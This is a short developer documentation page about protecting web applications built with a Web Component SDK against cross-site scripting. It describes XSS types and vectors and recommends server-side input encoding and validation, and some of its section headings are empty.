Creating Secure Applications¶
This topic covers describes steps that are required to prevent common web-application attacks such as Cross-Site Scripting (XSS). Using XSS, attackers can take advantage of security vulnerabilities in your application, which can cause significate damage to your business and technical infrastructure. Using Web Components from the Web Component SDK library without implementing additional security measures that are required to build secure applications is not recommended. You can defend against common XSS attacks by encoding and validating data input on the server side.
Attackers can send malicious code in different ways, such as:
- Input elements on the page
- HTTP requests
- URI addresses that point to invalid or private data
- Cookie files
There are multiple types of XSS attacks, including:
Reflected XSS Attacks¶
Stored XSS Attacks¶
Also referred to as persistent XSS, this attack happens when an attacker sends malicious code data which is then stored on the server. The malicious payload is sent in a later response to users who access the application or website.
DOM XSS Attacks¶
Sanitize All Input and Handle Data Carefully¶
To prevent XSS attacks, you should make that any user input does not contain malicious code using the following methods:
- Encode HTML data before placing it inside an HTML element.
These rules are examples that you can apply to make sure that web components such as the Grid and Text Area are safe to deploy in a production environment. You should always validate all input data, whether an application is hosted locally or available publicly.